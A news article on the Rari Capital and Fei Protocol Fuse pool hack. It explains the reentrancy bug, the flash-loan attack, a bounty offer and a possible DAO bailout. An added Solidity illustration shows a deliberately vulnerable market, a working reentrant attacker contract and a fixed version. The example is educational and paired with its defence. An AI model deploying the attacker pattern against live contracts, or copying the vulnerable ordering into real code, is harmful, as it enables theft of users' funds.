- Smart contract hackers targeted merged DeFi projects Rari Capital and Fei Protocol to steal nearly $80 million over the weekend
- Rather than seeking VC funding to make up for losses, the Tribe DAO, which handles their governance, can vote to make users whole
Crypto platform Fei Protocol hopes a “no questions asked” $10 million bounty will spur hackers to return nearly $80 million in digital assets stolen over the weekend.
Fei, the stablecoin issuer that merged with crypto lending startup Rari Capital just five months ago, made the offer on Twitter hours after the exploit, in which attackers drained the platform’s lending pools, was detected on Saturday.
“We are aware of an exploit on various Rari Fuse pools. We have identified the root cause and suspended all borrowing to mitigate further damage,” Fei Protocol tweeted. “To the exploiter, please accept a [$10 million] bonus and no questions asked if you return remaining user funds.”
Rari’s attacker exploited a critical “reentrancy” bug in the protocol code. A reentrancy bug arises when a contract makes an external call (for example, sending ETH to the caller) before it has finished updating its own state, so the recipient can call back into the contract while its accounting is still stale and have funds moved on the basis of numbers that are wrong.
For its codebase, the Rari Fuse platform forked (read: copied) Compound, the Ethereum money market, in early 2021. Compound enables crypto lending by letting users supply assets to earn interest and borrow against them as collateral. Borrowing limits follow from asset prices and per-asset collateral factors, and interest rates are set algorithmically from how heavily each pool is utilized.
The fork made changes to that code, and despite audits the flaw went undetected until it was too late.
Compound forks have suffered similar fates in the past. Rari even paid $2 million to security researchers who discovered an almost identical flaw in March.
Decentralized exchange Uniswap, lending platform Cream Finance and The DAO, among other projects, have fallen victim to reentrancy attacks, the earliest dating back to 2016.
Rari also lost $11 million to smart contract hackers in a separate attack last May, roughly 60% of the protocol’s equity.
In this case, the Rari Fuse lending pools (isolated markets, each listing its own set of ERC-20 tokens that users can lend and borrow) effectively failed to track the amount of borrowed cryptocurrency at the moment it mattered: the pool handed out the borrowed assets before it updated the borrower’s debt, so a contract that called back into the pool during that transfer still saw a zero debt balance.
That window illegitimately allowed large amounts of cryptocurrency to be borrowed, the loan collateral to be removed, and the borrowed funds to be kept, according to smart contract auditor CertiK.
The hackers flash-loaned $150 million worth of USDC stablecoin and 50,000 WETH ($141.5 million), deposited the funds as collateral in seven Rari Fuse pools, and borrowed against it.
Mid-borrow, before the pool had recorded the debt, their contract called the buggy “exitMarket” function, which released the collateral. They then repaid the flash loan and kept the “borrowed” funds from Rari Fuse, leaving the pools holding debt with nothing behind it. The hackers repeated this process across the pools until they had amassed around $80 million worth of crypto.
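The sequence described above, written out as a constructed Solidity example. This is added illustration, not Rari Fuse, Fei or Compound code: the contracts `TinyMarketVulnerable`, `ReentrantBorrower` and `TinyMarketFixed` and their functions are hypothetical, collateral and debt are counted 1:1 in wei with no prices or collateral factors, and the attack assumes the market already holds liquidity from other suppliers (the lenders the article refers to). The vulnerable market pays out before recording the debt, so a contract borrower can call `exitMarket()` from inside the payout; the fixed market writes the debt first and adds a reentrancy lock.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.17;

// Constructed illustration of the bug class described in the article. Not
// Rari Fuse, Fei or Compound code; names are hypothetical. Collateral and
// debt are both counted in wei, 1:1, so a borrow of X needs at least X of
// collateral; a real market applies oracle prices and collateral factors.
contract TinyMarketVulnerable {
    mapping(address => uint256) public collateral;
    mapping(address => uint256) public debt;

    function supply() external payable {
        collateral[msg.sender] += msg.value;
    }

    // VULNERABLE: the ETH is sent to the caller BEFORE the debt is recorded.
    // A contract borrower's receive() runs inside this call and sees debt == 0.
    function borrow(uint256 amount) external {
        require(collateral[msg.sender] >= debt[msg.sender] + amount, "undercollateralized");
        (bool ok, ) = msg.sender.call{value: amount}(""); // interaction first ...
        require(ok, "send failed");
        debt[msg.sender] += amount;                       // ... effect last
    }

    // Returns all collateral to a caller with no outstanding debt. Correct on
    // its own, but it trusts a debt balance that borrow() has not yet written.
    function exitMarket() external {
        require(debt[msg.sender] == 0, "outstanding debt");
        uint256 amount = collateral[msg.sender];
        collateral[msg.sender] = 0;
        (bool ok, ) = msg.sender.call{value: amount}("");
        require(ok, "send failed");
    }
}

// Minimal re-entrant borrower: deposits, borrows the same amount, and from
// inside the borrow's ETH transfer calls exitMarket() to pull the collateral
// back out. Afterwards the market holds a debt with no collateral behind it.
// Precondition: the market must hold at least `msg.value` of other users'
// liquidity, otherwise the inner exitMarket() payout fails and everything reverts.
contract ReentrantBorrower {
    TinyMarketVulnerable public immutable market;
    bool private reentered;

    constructor(TinyMarketVulnerable m) { market = m; }

    function attack() external payable {
        market.supply{value: msg.value}();
        market.borrow(msg.value); // control returns here only after receive() ran
    }

    receive() external payable {
        if (!reentered) {         // guard: exitMarket() itself sends ETH back here
            reentered = true;
            market.exitMarket();  // debt still reads 0, so collateral is released
        }
    }
}

// FIXED: checks-effects-interactions plus a reentrancy lock. Debt is written
// before any ETH leaves, and no function of the market can be re-entered
// while another is still executing.
contract TinyMarketFixed {
    mapping(address => uint256) public collateral;
    mapping(address => uint256) public debt;
    bool private locked;

    modifier nonReentrant() {
        require(!locked, "reentrant call");
        locked = true;
        _;
        locked = false;
    }

    function supply() external payable {
        collateral[msg.sender] += msg.value;
    }

    function borrow(uint256 amount) external nonReentrant {
        require(collateral[msg.sender] >= debt[msg.sender] + amount, "undercollateralized");
        debt[msg.sender] += amount;                       // effect first
        (bool ok, ) = msg.sender.call{value: amount}(""); // interaction last
        require(ok, "send failed");
    }

    function exitMarket() external nonReentrant {
        require(debt[msg.sender] == 0, "outstanding debt");
        uint256 amount = collateral[msg.sender];
        collateral[msg.sender] = 0;
        (bool ok, ) = msg.sender.call{value: amount}("");
        require(ok, "send failed");
    }
}
```

Against `TinyMarketVulnerable`, a call to `ReentrantBorrower.attack{value: 1 ether}()` ends with the borrower holding 2 ether (its own deposit back plus the borrowed ether) and the market recording `debt == 1 ether` with `collateral == 0` for that address, which is the bad debt the article describes. Against `TinyMarketFixed` the same call reverts: the inner `exitMarket()` trips the `nonReentrant` lock, and even without the lock it would fail the `debt == 0` check because the debt has already been written. Either defence alone stops this attack; using both is the usual practice, since the lock also covers paths a reviewer has not thought about.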
Rari Capital later disclosed that another 100 ETH had been stolen on Sunday from a Fuse pool on Arbitrum, an Ethereum layer-2 network.
BlockSec CTO Lei Wu confirmed to Blockworks that 5,400 ETH from the stolen stash was sent to crypto mixer Tornado Cash.
The stolen funds belong, in effect, to the Rari Fuse users who had lent out their crypto. Fei Protocol, then, isn’t exactly the victim, even though the exploit targeted its source code.
Rari developer Jack Longarzo told Blockworks that Rari’s Fuse platform and the Tribe DAO that handles Fei and Rari’s governance are the real victims. In fact, Tribe DAO may deliberate on releasing funds from its treasury to make Rari Fuse users whole. That treasury is currently worth $104 million, according to OpenOrgs.
While there is no formal bailout proposal yet (and Longarzo wouldn’t say if one was in the works), such a move would stand in stark contrast to the VC-funded bailouts of other beleaguered DeFi platforms such as Wormhole and Ronin, which generally involved more centralized and private decision-making than a community vote.
But there are indications that Tribe DAO participants may be losing faith. The DAO’s native token, TRIBE, is down 20% since the attack was first revealed.